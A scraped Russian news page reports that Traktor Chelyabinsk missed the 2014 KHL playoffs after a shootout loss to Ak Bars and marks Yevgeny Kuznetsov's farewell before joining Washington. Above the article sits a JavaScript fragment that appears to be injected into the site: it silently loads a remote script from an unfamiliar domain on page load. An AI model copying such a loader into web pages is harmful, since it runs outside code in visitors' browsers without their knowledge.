, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Чуда не произошло: «Трактор» не попал в плей-офф

Челябинский «Трактор» завершал регулярный сезон поединком против казанского «Ак Барса». Еще до начала этого матча стало известно, что наша команда потеряла шансы на выход в стадию плей-офф. Игравший на два часа раньше «Адмирал», который до этой игры опережал «Трактор» на одно очко, выиграл свой поединок у хабаровского «Амура» со счетом 4:1 и стал недосягаем для нашей команды. В итоге черно-белые уступили «Ак Барсу» в серии послематчевых буллитов 2:3 (0:1, 2:1, 0:0, 0:0 ОТ, 0:1 Б). В составе «Трактора» голами отметились Алексей Заварухин и Евгений Кузнецов.

В отсутствии всякой турнирной мотивации этот матч, по сути, превратился в проводы Евгения Кузнецова. О том, что в случае невыхода «Трактора» в плей-офф нападающий отправится за океан – в «Вашингтон», было известно уже давно. В этом матче Кузнецов исполнил свою давнюю мечту – вышел на лед с капитанской нашивкой. На трибунах ледовой арены «Трактор», которая, кстати, была заполнена только на две трети, болельщики вывесили баннеры с надписями: «Ты – наша гордость»,  «Спасибо, Кузя!» и другими словами поддержки.

Хоккеисты «Ак Барса» также ни испытывали никакой мотивации – казанский клуб обеспечил себе третье место в Восточной конференции. В этой ситуации матч получился больше похожим на товарищеский. Счет открыл после выхода один на один с Гарнеттом финский нападающий Янне Песонен. «Трактору» удалось отыграться во втором периоде. Красивая комбинация, разыгранная Антоном Глинкиным и Алексеем Заварихиным, завершила результативным рикошетом от клюшки защитника гостей. После этого удалось отличиться Евгению Кузнецову. Он реализовал двойное большинство. Эта шайба оказалась для нападающего 78 за «Трактор». Впрочем, вели в счете подопечные Валерия Белоусова недолго – цифры на табло сравнял Янне Песонен, оформивший дубль. Третий период, как и овертайм, заброшенных шайб не принесли. Исход поединка решался в серии послематчевых буллитов. Здесь удача оказалась на стороне хоккеистов «Ак Барса».

Несмотря на поражение, сезон для «Трактора» еще не закончен. Челябинский клуб примет участие в утешительном турнире – Кубке Надежды. Наша команда вступает в борьбу со второго раунда. Первый матч серии с пока еще неизвестным соперником состоится 14 марта.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
12:30 - 05 марта 2014
|
автор: U-RSS
|
(460)
|
(0)

Комментарии (0)

Я человек
Я бот